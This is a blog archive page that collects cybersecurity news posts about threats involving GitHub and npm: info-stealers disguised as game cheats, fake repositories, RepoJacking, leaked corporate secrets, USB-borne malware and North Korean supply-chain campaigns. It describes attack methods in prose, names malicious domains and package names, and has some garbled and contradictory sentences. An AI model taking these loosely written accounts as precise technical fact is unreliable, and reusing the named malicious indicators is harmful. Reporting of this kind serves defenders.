Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label GitHub. Show all posts
Threat Researchers
Cheat cryptocurrency Cyberattacks CyberCrime Cyberthreats GitHub Info-stealing JIT malware McAfee Passwords Threat Researchers

Information Stealer Malware Preys on Gamers via Deceptive Cheat Code Baits

 


There is a new info-stealing malware that appears as a cheat on a game called Cheat Lab, and it promises downloaders that if they convince their friends to download it too, they will receive a free copy. It is possible to harvest sensitive information from infected computers by using Redline malware, including passwords, cookies, autofill information, and cryptocurrency wallet information, which is one of the most powerful information-stealing malware programs. 

As a result of the malware's popularity among cybercriminals and its widespread distribution channels, it has become widespread. According to McAfee threat researchers, the new malware leverages Lua bytecode to evade detection. This makes it possible to inject malicious code into legitimate processes for stealth, while also benefiting from Just-In-Time compilations (JIT). 

Using a command and control server associated with the malware, the researchers link this variant to Redline, which has been linked to the malware for a long time. The tests BleepingComputer conducted revealed that the malware does not exhibit the typical behaviour associated with Redline, such as stealing browser information, saving passwords, and stealing cookies. 

Through a URL linked to Microsoft's 'vcpkg' GitHub repository, the malicious Redline payloads resemble demonstrations of cheating tools named "Cheat Lab" and "Cheater Pro". When the malware is executed, it unpacks two files, compiler.exe and lua51.dll, once the MSI installer is installed.  The malicious Lua bytecode is also dropped in a file called 'readme.txt'. 

The campaign uses an interesting lure to spread the malware even further by telling victims that if they convince their friends to install the cheating program, they will receive a free, fully licensed copy of the cheating program. As an added layer of legitimacy, the malware payload is distributed in the form of an uncompiled bytecode rather than an executable to avoid detection. 

To make sure that the malware is not detected, it comes in the form of an activation key included. Upon installation of the compiler.exe program, Lua bytecode is compiled and executed by it, and it also creates scheduled tasks that execute during system startup when the program is installed. The same executable also sets up persistence by creating scheduled tasks. 

McAfee reports that a fallback mechanism is used by the malware to persist the three files, copying them to a long random path under the program directory that the malware is active on the infected system, it will communicate with a C2 server and send screenshots and system information to the server, then wait for commands to be executed by the server on the host system. 

Even though it is unknown exactly how information thieves first infect computers, they are typically spread through malvertising, YouTube video descriptions, P2P downloads, and deceptive software download sites that can lead to infection. The Redline virus is a highly dangerous one, which is why users are urged not to use unsigned executables or download files from unreliable websites. 

As a result of this atta seemingly trustworthy programs, such as those found on Microsoft's GitHub, are at risk of infection by the Even though BleepingComputer contacted Microsoft about the executables that were distributed via its GitHub URLs, the company had not respond to the publication date.
Read more »
Threat Landscape
GitHub Malicious Payload malware Repository Scanning Threat Landscape

Hackers Use GitHub Search to Deliver Malware

 

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors concealed a harmful payload within Visual Studio project files, resulting in the execution of malware similar to Keyzetsu clipper that targets crypto wallets. The malware is installed continuously on Windows machines and is scheduled to be executed daily. 

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers inserted their malicious payload in a Visual Studio project file's pre-build event, causing it to be run automatically across the build process. The payload downloads additional content from certain URLs based on the victim's country, downloads encrypted files from the URLs, extracts and runs their content, and checks the system's IP address to see if it is in Russia. 

On April 3, the attackers began utilising a new URL that pointed to an archived executable file. To avoid detection by security solutions, they padded the executable with an abundance of zeros, preventing scanning.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

A scheduled task that points to an executable file shortcut is one way that malware tries to remain persistent. Several malicious repositories have received complaints from infected users, suggesting that Checkmarx's effort has been successful. 

In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.
Read more »
Security
AI-powered tool auto-fixes vulnerabilities Code Code Scanning Autofix CodeQL coding Cyber Security GHAS GitHub GitHub Advanced Security GitHub Copilot JavaScript Security

GitHub Unveils AI-Driven Tool to Automatically Rectify Code Vulnerabilities

GitHub has unveiled a novel AI-driven feature aimed at expediting the resolution of vulnerabilities during the coding process. This new tool, named Code Scanning Autofix, is currently available in public beta and is automatically activated for all private repositories belonging to GitHub Advanced Security (GHAS) customers.

Utilizing the capabilities of GitHub Copilot and CodeQL, the feature is adept at handling over 90% of alert types in popular languages such as JavaScript, Typescript, Java, and Python.

Once activated, Code Scanning Autofix presents potential solutions that GitHub asserts can resolve more than two-thirds of identified vulnerabilities with minimal manual intervention. According to GitHub's representatives Pierre Tempel and Eric Tooley, upon detecting a vulnerability in a supported language, the tool suggests fixes accompanied by a natural language explanation and a code preview, offering developers the flexibility to accept, modify, or discard the suggestions.

The suggested fixes are not confined to the current file but can encompass modifications across multiple files and project dependencies. This approach holds the promise of substantially reducing the workload of security teams, allowing them to focus on bolstering organizational security rather than grappling with a constant influx of new vulnerabilities introduced during the development phase.

However, it is imperative for developers to independently verify the efficacy of the suggested fixes, as GitHub's AI-powered feature may only partially address security concerns or inadvertently disrupt the intended functionality of the code.

Tempel and Tooley emphasized that Code Scanning Autofix aids in mitigating the accumulation of "application security debt" by simplifying the process of addressing vulnerabilities during development. They likened its impact to GitHub Copilot's ability to alleviate developers from mundane tasks, allowing development teams to reclaim valuable time previously spent on remedial actions.

In the future, GitHub plans to expand language support, with forthcoming updates slated to include compatibility with C# and Go.

For further insights into the GitHub Copilot-powered code scanning autofix tool, interested parties can refer to GitHub's documentation website.

Additionally, the company recently implemented default push protection for all public repositories to prevent inadvertent exposure of sensitive information like access tokens and API keys during code updates.

This move comes in response to a notable issue in 2023, during which GitHub users inadvertently disclosed 12.8 million authentication and sensitive secrets across more than 3 million public repositories. These exposed credentials have been exploited in several high-impact breaches in recent years, as reported by BleepingComputer.

Read more »
Python-based Malware
Cyber Attacks Cyber Security Threats data security GitHub Open Source Python-based Malware

GitHub Under Siege: Unraveling the Ongoing Automated Attack on Open-Source Repositories

 

GitHub, a cornerstone for programmers worldwide, faces a severe threat as an unknown attacker deploys an automated assault, cloning and creating malicious code repositories. The attack, involving sophisticated obfuscation and social engineering, poses a significant challenge to GitHub's security infrastructure. 

An assailant employs an automated process to fork and clone existing repositories, concealing malicious code under seven layers of obfuscation. These rogue repositories closely mimic legitimate ones, contributing to the challenge of detection. Developers unknowingly forking affected repos unintentionally amplify the attack. 

Once a developer utilizes a compromised repository, a hidden payload begins unpacking layers of obfuscation, revealing malicious Python code and a binary executable. The code then initiates the collection of confidential data and login details, which are subsequently uploaded to a control server. Security provider Apiiro's research and data teams report a substantial surge in the attack since its inception in May of the previous year. 

While GitHub diligently removes affected repositories, its automation detection system struggles to catch all instances. With millions of uploaded or forked repositories, even a 1% miss-rate translates to potentially thousands of compromised repos still operational. Initially modest in scale, the attack has grown in size and sophistication, presenting challenges for GitHub's security measures. 

Researchers attribute the operation's success to GitHub's vast user base and the increasing complexity of the attack technique. The attack's intrigue lies in the fusion of sophisticated automated methods and exploiting simple human nature. While obfuscation techniques become more intricate, the attackers heavily rely on social engineering to confuse developers, compelling them to select the malicious code. 

This unintentional spread exacerbates the attack's impact and heightens the difficulty of detection. As of now, GitHub has not issued a direct comment on the ongoing attack. However, the platform released a general statement reassuring users of its commitment to security. The platform employs manual reviews, at-scale detection utilizing machine learning, and continuously evolves to counter adversarial attacks. 

GitHub's popularity as a vital resource for developers globally has inadvertently made it a target. The platform's open-source nature and extensive user base create vulnerabilities that attackers exploit. Resolving the issue entirely proves to be an uphill battle, with GitHub still grappling with the effectiveness of the assailant's methods. 

GitHub, a linchpin for the global programming community, faces a formidable challenge as an automated attack exploits its open-source framework and vast user base. The ongoing assault, characterized by sophisticated obfuscation and social engineering, underscores the complexities of securing such a widely used platform. GitHub's response and adaptation will be crucial in mitigating the impact and fortifying defenses against evolving cyber threats.
Read more »
Supply chain vulnerability
Cyber Security GitHub RepoJacking Supply chain vulnerability

GitHub Vulnerability Exposes Millions to RepoJacking Threat

A recent study conducted by Massachusetts-based cloud-native security firm Aqua has shed light on a concerning vulnerability present in millions of software repositories hosted on GitHub. This vulnerability, dubbed RepoJacking, poses a significant threat to repositories belonging to esteemed organizations like Google, Lyft, and numerous others. 

RepoJacking involves the exploitation of vulnerabilities within GitHub repositories, potentially allowing malicious actors to gain unauthorized access and manipulate the code stored within. This vulnerability could have far-reaching consequences, including the compromise of sensitive data, the introduction of malicious code, and the disruption of software development processes. 

What is GitHub Repository and What Does it Mean When a Hacker Has Control Over It? 

Think of GitHub repositories as digital filing cabinets where developers store their code and project files. These cabinets use a system called Git to track changes made to the code over time and allow multiple developers to collaborate on the same project. However, if a hacker gains control of a GitHub repository, it can spell trouble. 

They could sneak in harmful code, swipe important data, disrupt the project's progress, or trick other developers into using their compromised code. This could lead to serious security breaches, data leaks, and project delays. So, it becomes crucial for developers to safeguard their repositories and carefully manage who has access to them. 

Emerging Dependency Repository Hijacking (aka RepoJacking)

Supply chain vulnerability, also referred to as dependency repository hijacking (RepoJacking), poses a significant threat to software security. In this form of attack, malicious actors exploit previously owned organizations or user names to distribute compromised versions of software repositories. These altered repositories may contain hidden malware, allowing attackers to perform harmful actions on systems where the tainted software is installed. 

The vulnerability arises from a flaw in the process when a repository owner decides to change their username. Although a connection is created between the old and new usernames to ensure continuity for users relying on dependencies from the old repository, this connection can be exploited by anyone who claims the old username. This loophole enables the injection of malicious code into the repository without detection. 

This type of supply-chain attack has been observed since at least 2016, when a college student uploaded custom scripts to popular package repositories like RubyGems, PyPi, and NPM, posing as legitimate packages. This technique, known as typosquatting, takes advantage of users' mistakes when selecting package names. 

Similarly, in 2021, a researcher employed a technique called dependency confusion or namespace confusion attack to breach the networks of major companies such as Apple, Microsoft, and Tesla. This involved placing malicious code packages with the same names as genuine dependencies used by the targeted companies, allowing the counterfeit code to be automatically downloaded and installed by the companies' package managers.
Read more »
User Security
Binance Cryptocurrency exchange Cyber Security GitHub User Security

Leaked Data from Binance Taken Down


One of the biggest cryptocurrency exchanges in the world's security has come under scrutiny following the recent disclosure of private information from Binance on GitHub. Several documents, including code, internal passwords, and architecture diagrams, were purportedly released by an account on GitHub going by the name "Termf" and were accessible to the public for several months. The content was removed after Binance requested a copyright takedown.

Binance has effectively removed its GitHub data breach

Various technical details, including code about Binance's security procedures, were included in the leaked material. Interestingly, this contained details on multi-factor authentication (MFA) and passwords. A large portion of the code that was made public concerned systems that were identified as "prod," denoting a link to Binance's operational website as opposed to test or development environments.

On January 5, 2024, 404 Media contacted Binance to inform the exchange about the compromised data, which is when the problem became apparent. Binance then retaliated by sending GitHub a copyright removal request. Binance admitted in this request that internal code from the disclosed material "poses a significant risk" to the exchange, resulting in "severe financial harm" as well as possible user misunderstanding or harm.

What next?

Even after admitting the leak, Binance sent out a representative to try and reassure its user base. According to the spokesman, Binance's security team examined the circumstances and came to the conclusion that the code that had been leaked was not similar to the code that was being produced at the time. The representative emphasized the protection of users' data and assets and stated that there was only a "negligible risk" from the compromised information.

The significance of strong security procedures in the Bitcoin sector is highlighted by this occurrence. Crypto exchanges are required to uphold strict security procedures because of their role in managing users' sensitive information and financial assets. The prolonged public disclosure of security-related code and internal passwords on a public forum calls into doubt the effectiveness of Binance's security protocols.

The necessity of heightened security protocols

Another level of worry is raised by the exposed data, especially the code about security protocols like multi-factor authentication and passwords. These kinds of security lapses can have serious repercussions, including the compromise of user funds and accounts. It draws attention to the continuous difficulties Bitcoin platforms have in maintaining the integrity and confidentiality of their internal systems.

Read more »
social media risks
data deception GitHub malware Malware attacks social media risks

Sneaky USB Hackers Pose Threat on Favorite Sites

 

In a recent revelation in the world of cybersecurity, a financially motivated hacker has been discovered utilizing USB devices as a means to infiltrate computer systems. This malicious group has chosen a cunning approach, hiding their harmful software in plain view on widely used platforms like GitHub, Vimeo, and Ars Technica. 

Their strategy involves embedding malicious codes within seemingly innocuous content, creating a challenging environment for detection and prevention. We strongly advise our readers to maintain a vigilant stance while navigating the online platforms. 

Reassuring our website visitors, we confirm that the peculiar text strings encountered on GitHub and Vimeo pose no harm upon clicking. However, there's a twist: these seemingly harmless strings serve as a key tool for hackers, discreetly facilitating the download and deployment of harmful software in their attacks. 

The cybersecurity watchdogs, Mandiant, are actively monitoring this group of hackers identified as UNC4990. Operating in the shadows since 2020, they have specifically targeted individuals in Italy. 

The cyber assault unfolds with an unsuspecting individual clicking on a deceptive file on a USB drive. The mystery lies in how these USB devices find their way into the hands of unsuspecting users. Once opened, the file initiates a digital script, explorer.ps1, downloading an intermediary code that reveals a web address. This address acts as the gateway for installing a malware downloader named 'EMPTYSPACE.' 

UNC4990 initially employed special files on GitHub and GitLab but later shifted their tactics to Vimeo and Ars Technica, embedding their secret codes in mundane areas on these sites to avoid suspicion. The harmful PowerShell script, decoded, decrypted, and executed from legitimate sites, leads to the activation of EMPTYSPACE. This payload establishes communication with the hackers' control server, subsequently downloading a sophisticated backdoor called 'QUIETBOARD.' 

Additionally, UNC4990 employs this backdoor for crypto mining activities targeting Monero, Ethereum, Dogecoin, and Bitcoin. The financial gains from this cyber scheme exceed $55,000, not including the hidden Monero. 

QUIETBOARD, UNC4990's advanced backdoor, exhibits a wide range of capabilities, including executing commands, cryptocurrency theft, USB drive propagation, screenshot capture, system information collection, and geographical location determination. Mandiant highlights UNC4990's penchant for experimentation to refine their attack strategies. 

Despite ongoing efforts to mitigate USB-based malware threats, they persist as a significant danger. The tactic of concealing within reputable sites challenges traditional security measures, underscoring the need for enhanced online safety practices. In the evolving digital landscape, staying informed and vigilant is paramount. Cyber threats may emerge from unexpected quarters, demanding a proactive approach to cybersecurity.
Read more »
Vulnerabilities and Exploits
Cybersecurity Data Breach Digital Privacy GitHub Mercedes-Benz Robust security Vulnerabilities and Exploits

Mercedes-Benz Accidentally Reveals Secret Code

 



Mercedes-Benz faces the spotlight as a critical breach comes to light. RedHunt Labs, a cybersecurity firm, discovered a serious vulnerability in Mercedes's digital security, allowing unauthorised entry to confidential internal data. Shubham Mittal, Chief Technology Officer at RedHunt Labs, found an employee's access token exposed on a public GitHub repository during a routine scan in January. This access token, initially meant for secure entry, inadvertently served as the gateway to Mercedes's GitHub Enterprise Server, posing a risk to sensitive source code repositories. The incident reiterates the importance of robust cybersecurity measures and highlights potential risks associated with digital access points.

Mittal found an employee's authentication token, an alternative to passwords, exposed in a public GitHub repository. This token provided unrestricted access to Mercedes's GitHub Enterprise Server, allowing the unauthorised download of private source code repositories. These repositories contained a wealth of intellectual property, including connection strings, cloud access keys, blueprints, design documents, single sign-on passwords, API keys, and other crucial internal details.

The exposed repositories were found to include Microsoft Azure and Amazon Web Services (AWS) keys, a Postgres database, and actual Mercedes source code. Although it remains unclear whether customer data was compromised, the severity of the breach cannot be underestimated.

Upon notification from RedHunt Labs, Mercedes responded by revoking the API token and removing the public repository. Katja Liesenfeld, a Mercedes spokesperson, acknowledged the error, stating, "The security of our organisation, products, and services is one of our top priorities." Liesenfeld assured that the company would thoroughly analyse the incident and take appropriate remedial measures.

The incident, which occurred in late September 2023, raises concerns about the potential exposure of the key to third parties. Mercedes has not confirmed if others discovered the exposed key or if the company possesses the technical means to track any unauthorised access to its data repositories.

This incident comes on the heels of a similar security concern with Hyundai's India subsidiary, where a bug exposed customers' personal information. The information included names, mailing addresses, email addresses, and phone numbers of Hyundai Motor India customers who had their vehicles serviced at Hyundai-owned stations across India.

These security lapses highlight the importance of robust cybersecurity measures in an era where digital threats are increasingly sophisticated. Companies must prioritise the safeguarding of sensitive data to protect both their intellectual property and customer information.

As the situation unfolds, Mercedes will undoubtedly face scrutiny over its security protocols, emphasising the need for transparency and diligence in handling such sensitive matters. Consumers are reminded to remain vigilant about the cybersecurity practices of the companies they entrust with their data.


Read more »
Online Safety
Content Abuse Cyber Crime GitHub malware Online Safety

GitHub Faces Rise in Malicious Use

 


GitHub, a widely used platform in the tech world, is facing a rising threat from cybercriminals. They're exploiting GitHub's popularity to host and spread harmful content, making it a hub for malicious activities like data theft and controlling compromised systems. This poses a challenge for cybersecurity, as the bad actors use GitHub's legitimacy to slip past traditional defences. 

 Known as ‘living-off-trusted-sites,’ this technique lets cybercriminals blend in with normal online traffic, making it harder to detect. Essentially, they're camouflaging their malicious activities within the usual flow of internet data. GitHub's involvement in delivering harmful code adds an extra layer of complexity. For instance, there have been cases of rogue Python packages (basically, software components) using secret GitHub channels for malicious commands on hacked systems. 

This situation highlights the need for increased awareness and updated cybersecurity strategies to tackle these growing threats. It's a reminder that even widely used platforms can become targets for cybercrime, and staying informed is crucial to staying secure. 

While it's not very common for bad actors to fully control and command systems through GitHub, they often use it as a way to share secret information. This is called a "dead drop resolver." It's like leaving a message in a hidden spot for someone else to pick up. Malware like Drokbk and ShellBox frequently use this technique. 

Another thing they sometimes do is use GitHub to sneakily take information out of a system. This doesn't happen a lot, and experts think it's because there are limits on how much data they can take and they want to avoid getting caught. 

Apart from these tricks, bad actors find other ways to misuse GitHub. For example, they might use a feature called GitHub Pages to trick people into giving away sensitive information. Sometimes, they even use GitHub as a backup communication channel for their secret operations. 

Understanding these tactics is important because it shows how people with bad intentions can use everyday platforms like GitHub for sneaky activities. By knowing about these things, we can be more careful and put in measures to protect ourselves from online threats. 

This trend of misusing popular online services extends beyond GitHub to other familiar platforms like Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, Trello, and Discord. It's not just limited to GitHub; even source code and version control platforms like GitLab, BitBucket, and Codeberg face exploitation. 

GitHub acknowledges that there's no one-size-fits-all solution to detect abuse on their platform. They suggest using a combination of strategies influenced by specific factors like available logs, how organisations are structured, patterns of service usage, and the willingness to take risks. To know that this problem isn't unique to GitHub is crucial. Threat actors are using various everyday services to carry out their activities, making it important for users and organisations to be aware and adopt a mix of strategies to detect and prevent abuse. This includes being mindful of how different platforms may be misused and tailoring detection methods accordingly.


Read more »
Security Breach
Cryptopolitan Cyber Attacks DeFi DeFi Platforms GitHub hack Security Breach

Hackers Steal Assets Worth $484,000 in Ledger Security Breach


Threat actors responsible for attacking Ledger’s connector library have stolen assets valued at approximately $484,000. This information was given by the blockchain analysis platform Lookonchain. Ledger has said that the security breach might have a large effect, possibly totalling hundreds of thousands of dollars, even if they are yet to confirm the actual valuation. 

Direct Impact of the Hack

According to a report by Cryptopolitan, the breach happened when malicious code was added to Ledger's Github repository for Connect Kit, an essential component that is required by several DeFi protocols in order to communicate with hardware wallets for cryptocurrencies. Every application that used the Connect Kit had issues with its front end due to the malicious code. Notable protocols affected by this security flaw were Sushi, Lido, Metamask, and Coinbase.

In regards to the incident, Ledger informed that one of its employees had fallen victim to a phishing attack, resulting in the unauthorized leak of a compromised version of the Ledger Connect Kit. The leaked code revealed the name and email address of the former employees. It is important to note that the developer was first believed to be behind the exploit by the cryptocurrency community. Ledger subsequently stated, nevertheless, that the incident was the consequence of a former employee falling for a phishing scheme.

Ledger, after acknowledging the incident, identified and removed the exploited version of the software. However, despite the swift response, the damage was already done, since the software was left vulnerable for at least two hours, in the course of which the threat actors had already drained the funds. 

The company acted promptly, identifying and removing the harmful version of the software. However, despite Ledger’s quick response, the damage had already been done in approximately two hours, during which the hackers drained funds.

Broader Implications for the DeFi Community

This incident has raised major concerns regarding the security infrastructure of decentralized applications. DeFi protocols frequently rely on code from multiple software providers, including Ledger, which leaves them vulnerable to multiple potential points of failure.

This incident has further highlighted the significance of boosting security protocols across the DeFi ecosystem.

The victims who were directly affected by the attack included users of services such as revoke.cash. Also, the service normally used in withdrawing permissions from DeFi protocols following security breaches was compromised. Users who were trying to protect their assets were unintentionally sent to a fraudulent token drainer, which increased the extent of the theft.  

Read more »
Vulnerabilities and Exploits
Android App Safety Apple Bluetooth GitHub Linux Linux Servers macOS Vulnerabilities and Exploits

Bluetooth Security Flaw Strikes Apple, Linux, and Android Devices

Vulnerabilities in the constantly changing technology landscape present serious risks to the safety of our online lives. A significant Bluetooth security weakness that affects Apple, Linux, and Android devices has recently come to light in the cybersecurity community, potentially putting millions of users at risk of hacking.

The flaw, identified as CVE-2023-45866, was first brought to light by security researchers who detected a potential loophole in the Bluetooth communication protocol. The severity of the issue lies in its capability to allow hackers to take control of the targeted devices, potentially leading to unauthorized access, data theft, and even remote manipulation.

Security experts from SkySafe, a renowned cybersecurity firm, delved into the intricacies of the vulnerability and disclosed their findings on GitHub. If successfully employed, the exploit could lead to a myriad of security breaches, prompting urgent attention from device manufacturers and software developers alike.

Apple, a prominent player in the tech industry, was not exempt from the repercussions of this Bluetooth bug. The flaw could potentially enable hackers to hijack Apple devices, raising concerns among millions of iPhone, iPad, and MacBook users. Apple, known for its commitment to user security, has been swift in acknowledging the issue and is actively working on a patch to mitigate the vulnerability.

Linux, an open-source operating system widely used across various platforms, also faced the brunt of this security loophole. With a significant user base relying on Linux for its robustness and versatility, the impact of the Bluetooth flaw extends to diverse systems, emphasizing the urgency of a comprehensive solution.

Android, the dominant mobile operating system, issued a security bulletin addressing the Bluetooth vulnerability. The Android Security Bulletin for December 2023 outlined the potential risks and provided guidance on necessary patches and updates. As the flaw could compromise the security of Android devices, users are strongly advised to implement the recommended measures promptly.

Cybersecurity experts stated, "The discovery of this Bluetooth vulnerability is a stark reminder of the constant vigilance required in the digital age. It underscores the importance of prompt action by manufacturers and users to ensure the security and integrity of personal and sensitive information."

This Bluetooth security issue serves as a grim reminder of the ongoing fight against new cyber threats as the tech world struggles with its implications. In order to strengthen its commitment to a secure digital future, the IT industry is working together with developers, manufacturers, and consumers to quickly identify and fix vulnerabilities.

Read more »
Spams
Cyber Security GitHub Google RETVec Spams

Google Introduces RETVec: Gmail’s New Defense to Identify Spams


Google has recently introduced a new multilingual text vectorizer called RETVec (an acronym for Resilient and Efficient Text Vectorizer), to aid identification of potentially malicious content like spam and fraudulent emails in Gmail. 

While massive platforms like YouTube and Gmail use text classification models to identify frauds, offensive remarks, and phishing attempts, threat actors are known to create counter-strategies to get around these security mechanisms. 

The project description on GitHub reads, "RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more."

"The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently."

The Google-sponsored platforms reveal that they have been using Adversarial text manipulations, such as the usage of homoglyphs, keyword stuffing, and invisible characters. 

With its out-of-the-box support for over 100 languages, RETVec seeks to contribute to developing more robust and computationally affordable server-side and on-device text classifiers that are more durable and effective. 

In natural language processing (NLP), vectorization is a technique that maps words or phrases from a lexicon to a matching numerical representation for use in sentiment analysis, text classification, and named entity recognition, among other analyses. 

Google’s anti-abuse researchers Elie Bursztein and Marina Zhang note in the Google Security blog that, “due to its novel architecture, RETVec works out-of-the-box on every language and all UTF-8 characters without the need for text preprocessing, making it the ideal candidate for on-device, web, and large-scale text classification deployments." 

Google further notes that incorporating vectorizer into Gmail has really helped in detecting spam, with the detection rate escalating over the baseline by 38%. Also, the false positive rate has declined by 19.4%. 

Moreover, vectorization has also reduced the model's Tensor Processing Unit (TPU) usage by 83%. 

"Models trained with RETVec exhibit faster inference speed due to its compact representation. Having smaller models reduces computational costs and decreases latency, which is critical for large-scale applications and on-device models," Bursztein and Zhang added. 

Spams are the most popular attack vector in the virtual space, used by almost every cybercriminal. The popularity comes with its convenience of being omnipresent, cheap, and efficient, enabling cybercriminals to transfer malware and access sensitive data from targeted systems.  

Read more »
NPM
Cyber Attacks Cyber Hackers Cyberattack Threat CyberCrime Cybersecurity GDPR GitHub North Korea NPM

New Cyber Threat: North Korean Hackers Exploit npm for Malicious Intent

 


There has been an updated threat warning from GitHub regarding a new North Korean attack campaign that uses malicious dependencies on npm packages to compromise victims. An earlier blog post published by the development platform earlier this week claimed that the attacks were against employees of blockchain, cryptocurrency, online gambling, and cybersecurity companies.   

Alexis Wales, VP of GitHub security operations, said that attacks often begin when attackers pretend to be developers or recruiters, impersonating them with fake GitHub, LinkedIn, Slack, or Telegram profiles. There are cases in which legitimate accounts have been hijacked by attackers. 

Another highly targeted attack campaign has been launched against the NPM package registry, aimed at enticing developers into downloading immoral modules by enticing them to install malicious third-party software. There was a significant attack wave uncovered in June, and it has since been linked to North Korean threat actors by the supply chain security firm Phylum, according to Hacker News. This attack wave appears to exhibit similar behaviours as another that was discovered in June. 

During the period from August 9 to August 12, 2023, it was identified that nine packages were uploaded to NPM. Among the libraries that are included in this file are ws-paso-jssdk, pingan-vue-floating, srm-front-util, cloud-room-video, progress-player, ynf-core-loader, ynf-core-renderer, ynf-dx-scripts, and ynf-dx-webpack-plugins. A conversation is initiated with the target and attempts are made to move the conversation to another platform after contacting them. 

As the attacker begins to execute the attack chain, it is necessary to have a post-install hook in the package.json file to execute the index.js file which executes after the package has been installed. In this instance, a daemon process is called Android. The daemon is launched as a dependency on the legitimate pm2 module and, in turn, a JavaScript file named app.js is executed. 

A JavaScript script is crafted in a way that initiates encrypted two-way communications with a remote server 45 seconds after the package is installed by masquerading as RustDesk remote desktop software – "ql. rustdesk[.]net," a spoofed domain posing as the authentic RustDesk remote desktop software. This information entails the compromised host's details and information. 

The malware pings every 45 seconds to check for further instructions, which are decoded and executed in turn, after which the malware checks for new instructions every 45 seconds. As the Phylum Research Team explained, "It would seem to be that the attackers are monitoring the GUIDs of the machines in question and selectively sending additional payloads (which are encoded Javascript code) to the machines of interest in the direction of the GUID monitors," they added. 

In the past few months there have been several typosquat versions of popular Ethereum packages in the npm repository that attempts to make HTTP requests to Chinese servers to retrieve the encryption key from the wallet on the wallet.cba123[.]cn, which had been discovered. 

Additionally, the highly popular NuGet package, Moq, has come under fire since new versions of the package released last week included a dependency named SponsorLink, that extracted the SHA-256 hash of developers' email addresses from local Git configurations and sent them to a cloud service without their knowledge. In addition, Moq has been receiving criticism after new versions released last week came with the SponsorLink dependency. 

Version 4.20.2 of the app has been rolled back as a result of the controversial changes that raise GDPR compliance issues. Despite this, Bleeping Computer reported that Amazon Web Services (AWS) had withdrawn its support for the project, which may have done serious damage to the project's reputation. 

There are also reports that organizations are increasingly vulnerable to dependency confusion attacks, which could've led to developers unwittingly introducing malicious or vulnerable code into their projects, thus resulting in large-scale attacks on supply chains on a large scale. 

There are several mitigations that you can use to prevent dependency confusion attacks. For example, we recommend publishing internal packages under scopes assigned to organizations and setting aside internal package names as placeholders in the public registry to prevent misuse of those names.

Throughout the history of cybersecurity, the recent North Korean attack campaign exploiting npm packages has served as an unmistakable reminder that the threat landscape is transforming and that more sophisticated tactics are being implemented to defeat it. For sensitive data to be safeguarded and further breaches to be prevented, it is imperative that proactive measures are taken and vigilant measures are engaged. To reduce the risks posed by these intricate cyber tactics, organizations need to prioritize the verification of identity, the validation of packages, and the management of internal packages.
Read more »
Technology
Cyber Victim Cyberattacks Cybersecurity GitHub lazarus Malicious Threat NPM Package Technology

GitHub Issues Alert on Lazarus Group's Social Engineering Attack on Developers

 


According to a security alert issued by GitHub, this social engineering campaign is designed to compromise developers' accounts in the blockchain, cryptocurrency, online gambling, and cybersecurity industries. This is done through social engineering techniques. 

The campaign was reportedly linked to the Lazarus hacking group sponsored by the North Korean state. It was also linked to the groups Jade Sleet and TraderTraitor (both tools of Microsoft Threat Intelligence). There was a report released by the United States government in 2022 which detailed threat actors' tactics. 

Hacking group targets cryptocurrency companies and cybersecurity researchers to eavesdrop on them and steal their coins. The Lazarus Group is a cybercrime organization that targets cryptocurrency companies and cyber researchers using various names, such as Jade Sleet and TraderTraitor. Cyberespionage and cryptocurrency theft are two of the group's activities. According to GitHub, no GitHub accounts were compromised in this campaign, nor were any npm systems accounts.  

Lazarus Group reportedly uses legitimate GitHub or social media accounts that have been compromised or fake personas to pose as developers or recruiters on the platforms where they operate. This includes GitHub or social media. There is a wide range of personas designed to engage individuals in targeted industries. Ultimately, these personas will lead individuals to another platform, such as WhatsApp, through conversation. 

It is normally threat actors who initiate collaboration on a project. They invite targets to clone a GitHub repository related to media players and cryptocurrency trading tools after establishing trust between them. There are, however, malicious NPM dependencies on these projects that can download additional malware onto the devices of their targets. 

In June 2022, Phylum published a report on NPM packages that have been based on malicious code, with details about how they behave despite GitHub not providing details about the malware's specific behavior. Phylum reports that these packages function as malware downloaders that connect to remote websites via a browser. The download of additional payloads onto the infected machine. Several limitations in the payload reception process meant that researchers were unable to analyze the final malware delivered. 

As a consequence of this campaign, all NPM accounts and GitHub accounts associated with it have been suspended by GitHub. Additionally, they have published a list of indicators that can be used to identify whether a campaign is successful, including domains, GitHub accounts, and NPM packages. GitHub says the campaign was not intended to damage their systems. 

Lazarus has run previous social engineering campaigns similar to this one in the past. A few of these attacks included the targeting of security researchers in January 2021, a fake company website that was created in March 2021, and a fake email campaign in July 2021. As a result of these attacks, threat actors were effective at creating elaborate personas and distributing malware disguised as exploits for vulnerabilities. 

Lazarus is a group that targets cryptocurrency companies and developers to fund initiatives for the North Korean government. Several million dollars worth of cryptocurrency was stolen from them due to their involvement in the crime. It is worth noting that the theft of over 617 million dollars worth of Ethereum and USDC tokens was reported in an attack recently on Axie Infinity. 

Aside from fund theft and phishing scams, Lazarus has allegedly employed other tactics as well, including sending malicious PDF files disguised as job offers to targets that could compromise their bank accounts. In this case, the group has successfully delivered malware using false employment opportunities as a method of delivering their malware. 

Those in the target industries and developers should remain vigilant against the various types of social engineering attacks that are out there. Generally, individuals can protect themselves and their devices from malicious software and potentially compromised devices if they are aware of the tactics used by threat actors and adopt good cybersecurity practices, such as verifying the authenticity of requests and avoiding links and downloads that appear suspicious or unknown. 

